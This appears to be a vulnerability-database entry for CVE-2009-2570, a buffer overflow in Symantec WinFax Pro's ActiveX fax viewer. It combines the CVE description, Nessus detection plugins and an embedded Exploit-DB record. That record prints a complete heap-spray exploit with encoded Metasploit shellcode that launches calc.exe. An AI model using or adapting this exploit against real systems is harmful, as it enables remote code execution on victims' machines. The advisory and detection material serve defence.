ID CVE-2009-2570 Type cve Reporter cve@mitre.org Modified 2018-10-12T21:52:00
Description
Stack-based buffer overflow in the Symantec.FaxViewerControl.1 ActiveX control in WinFax\DCCFAXVW.DLL in Symantec WinFax Pro 10.03 allows remote attackers to execute arbitrary code via a long argument to the AppendFax method.
{"exploitdb": [{"lastseen": "2016-02-01T07:39:12", "bulletinFamily": "exploit", "description": "Symantec Fax Viewer Control 10 (DCCFAXVW.DLL) Remote BOF Exploit. CVE-2009-2570. Remote exploit for windows platform", "modified": "2009-04-29T00:00:00", "published": "2009-04-29T00:00:00", "id": "EDB-ID:8562", "href": "https://www.exploit-db.com/exploits/8562/", "type": "exploitdb", "title": "Symantec Fax Viewer Control 10 DCCFAXVW.DLL Remote BoF Exploit", "sourceData": "<!--\nSymantec Fax Viewer Control v10 (DCCFAXVW.DLL) remote buffer overflow exploit (IE7)\nby Nine:Situations:Group::trotzkista\nsite: http://retrogod.altervista.org/\n\ntested against: Symantec WinFax Pro 10.03\n Internet Explorer 7, XP SP3\n\nsome details:\nCLSID: {C05A1FBC-1413-11D1-B05F-00805F4945F6}\nProgid: Symantec.FaxViewerControl.1\nBinary Path: C:\\Programmi\\WinFax\\DCCFAXVW.DLL\nKillBitted: False\nImplements IObjectSafety: False\nSafe For Initialization (Registry): True\nSafe For Scripting (Registry): True\n-->\n<html>\n<object classid='clsid:C05A1FBC-1413-11D1-B05F-00805F4945F6' id='obj' />\n</object>\n<script language='javascript'>\n// win32_exec - EXITFUNC=seh CMD=c:\\windows\\system32\\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com\nvar scode = unescape(\"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949\" +\n \"%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a\" +\n \"%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241\" +\n \"%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c\" +\n \"%u6338%u7574%u3350%u6730%u4c70%u734b%u5775%u6e4c\" +\n \"%u636b%u454c%u6355%u3348%u5831%u6c6f%u704b%u774f\" +\n \"%u6e68%u736b%u716f%u6530%u6a51%u724b%u4e69%u366b\" +\n \"%u4e54%u456b%u4a51%u464e%u6b51%u4f70%u4c69%u6e6c\" +\n \"%u5964%u7350%u5344%u5837%u7a41%u546a%u334d%u7831\" +\n \"%u4842%u7a6b%u7754%u524b%u6674%u3444%u6244%u5955\" +\n \"%u6e75%u416b%u364f%u4544%u6a51%u534b%u4c56%u464b\" +\n \"%u726c%u4c6b%u534b%u376f%u636c%u6a31%u4e4b%u756b\" +\n \"%u6c4c%u544b%u4841%u4d6b%u5159%u514c%u3434%u4a44\" +\n \"%u3063%u6f31%u6230%u4e44%u716b%u5450%u4b70%u6b35\" +\n \"%u5070%u4678%u6c6c%u634b%u4470%u4c4c%u444b%u3530\" +\n \"%u6e4c%u6c4d%u614b%u5578%u6a58%u644b%u4e49%u6b6b\" +\n \"%u6c30%u5770%u5770%u4770%u4c70%u704b%u4768%u714c\" +\n \"%u444f%u6b71%u3346%u6650%u4f36%u4c79%u6e38%u4f63\" +\n \"%u7130%u306b%u4150%u5878%u6c70%u534a%u5134%u334f\" +\n \"%u4e58%u3978%u6d6e%u465a%u616e%u4b47%u694f%u6377\" +\n \"%u4553%u336a%u726c%u3057%u5069%u626e%u7044%u736f\" +\n \"%u4147%u4163%u504c%u4273%u3159%u5063%u6574%u7035\" +\n \"%u546d%u6573%u3362%u306c%u4163%u7071%u536c%u6653\" +\n \"%u314e%u7475%u7038%u7765%u4370\");\nbigblock = unescape(\"%u0c0c%u0c0c\");\nheadersize = 20;\nslackspace = headersize+scode.length;\nwhile (bigblock.length<slackspace) bigblock+=bigblock;\nfillblock = bigblock.substring(0, slackspace);\nblock = bigblock.substring(0, bigblock.length-slackspace);\nwhile(block.length+slackspace<0x40000) block = block+block+fillblock;\nmemory = new Array();\nfor (i=0;i<444;i++){memory[i] = block+scode}\n</script>\n<script language=\"vbscript\">\nobj.AppendFax string(1111,unescape(\"%0c\"))\n</script>\n\n# milw0rm.com [2009-04-29]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8562/"}], "nessus": [{"lastseen": "2019-12-13T09:58:05", "bulletinFamily": "scanner", "description": "The version of the Symantec Fax Viewer Control ActiveX control, a\ncomponent included with Symantec Winfax Pro and installed on the\nremote Windows host, reportedly contains a stack-based buffer overflow\nthat can be triggered by calling the ", "modified": "2019-12-02T00:00:00", "id": "WINFAX_ACTIVEX_APPENDFAX_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/38652", "published": "2009-04-30T00:00:00", "title": "Symantec Fax Viewer Control ActiveX Control AppendFax Overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(38652);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2009-2570\");\n script_bugtraq_id(34766);\n script_xref(name:\"Secunia\", value:\"34925\");\n\n script_name(english:\"Symantec Fax Viewer Control ActiveX Control AppendFax Overflow\");\n script_summary(english:\"Checks for the control\");\n \n script_set_attribute( attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by a\nbuffer overflow vulnerability.\" );\n script_set_attribute( attribute:\"description\", value:\n\"The version of the Symantec Fax Viewer Control ActiveX control, a\ncomponent included with Symantec Winfax Pro and installed on the\nremote Windows host, reportedly contains a stack-based buffer overflow\nthat can be triggered by calling the 'AppendFax' method with an overly\nlong argument. If an attacker can trick a user on the affected host\ninto viewing a specially crafted HTML document, he can leverage this\nissue to execute arbitrary code on the affected system subject to the\nuser's privileges.\" );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"http://www.nessus.org/u?1078766b\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2009/Apr/285\"\n );\n script_set_attribute(\n attribute:\"see_also\", \n value:\"https://seclists.org/bugtraq/2009/Apr/296\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Remove the affected software as it is no longer supported by Symantec.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2009/04/30\");\n script_cvs_date(\"Date: 2018/11/15 20:50:29\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{C05A1FBC-1413-11D1-B05F-00805F4945F6}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n ver = activex_get_fileversion(clsid:clsid);\n\n if (ver) ver = string(\"Version \", ver);\n else ver = string(\"An unknown version\");\n\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n ver, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n}\nactivex_end();\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:17:56", "bulletinFamily": "scanner", "description": "The Microsoft Data Analyzer ActiveX control has a remote code\nexecution vulnerability. The system may also have one or more\nvulnerable third-party ActiveX controls installed.\n\nA remote attacker could exploit these issues by tricking a user into\nrequesting a maliciously crafted web page, resulting in arbitrary code\nexecution.", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS10-008.NASL", "href": "https://www.tenable.com/plugins/nessus/44418", "published": "2010-02-09T00:00:00", "title": "MS10-008: Cumulative Security Update of ActiveX Kill Bits (978262)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(44418);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2009-2570\", \"CVE-2009-3735\", \"CVE-2010-0252\");\n script_bugtraq_id(34766, 38045, 38060, 38066, 38067);\n script_xref(name:\"MSFT\", value:\"MS10-008\");\n script_xref(name:\"MSKB\", value:\"978262\");\n\n script_name(english:\"MS10-008: Cumulative Security Update of ActiveX Kill Bits (978262)\");\n script_summary(english:\"Checks if several kill bits have been set\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Windows host is missing an update that disables selected\nActiveX controls.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Microsoft Data Analyzer ActiveX control has a remote code\nexecution vulnerability. The system may also have one or more\nvulnerable third-party ActiveX controls installed.\n\nA remote attacker could exploit these issues by tricking a user into\nrequesting a maliciously crafted web page, resulting in arbitrary code\nexecution.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003,\nVista, 2008, and 7.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(94, 119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\ninclude(\"misc_func.inc\");\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-008';\nkbs = make_list(\"978262\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0, \"The registry wasn't enumerated.\");\nif (hotfix_check_sp(win2k:6, xp:4, win2003:3, vista:3, win7:1) <= 0)\n exit(0, \"The host is not affected based on its version / service pack.\");\nif (hotfix_check_server_core() == 1) exit(0, \"Windows Server Core installs are not affected.\");\nif (activex_init() != ACX_OK) exit(1, \"Unable to initialize the ActiveX API.\");\n\n\n\nkb = \"978262\";\n\n# Test each control.\ninfo = \"\";\nclsids = make_list(\n '{E0ECA9C3-D669-4EF4-8231-00724ED9288F}', # max3activex.dll\n '{C05A1FBC-1413-11D1-B05F-00805F4945F6}', # Symantec WinFax Pro 10.3\n '{5D80A6D1-B500-47DA-82B8-EB9875F85B4D}', # Google Desktop Gadget 5.8\n '{0CCA191D-13A6-4E29-B746-314DEE697D83}', # Facebook Photo Updater 5.5.8\n '{2d8ed06d-3c30-438b-96ae-4d110fdc1fb8}' # PandaActiveScan Installer 2.0\n);\n\nforeach clsid (clsids)\n{\n if (activex_get_killbit(clsid:clsid) == 0)\n {\n info += ' ' + clsid + '\\n';\n if (!thorough_tests) break;\n }\n}\nactivex_end();\n\n\nif (info)\n{\n if (report_verbosity > 0)\n {\n if (max_index(split(info)) > 1) s = \"s\";\n else s = \"\";\n\n report =\n '\\nThe kill bit has not been set for the following control'+s+' :\\n\\n'+\n info;\n\n if (!thorough_tests)\n {\n report +=\n '\\nNote that Nessus did not check whether there were other kill bits\\n'+\n 'that have not been set because the \"Perform thorough tests\" setting\\n'+\n 'was not enabled when this scan was run.\\n';\n }\n hotfix_add_report(info, bulletin:bulletin, kb:kb);\n }\n hotfix_security_warning();\n\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}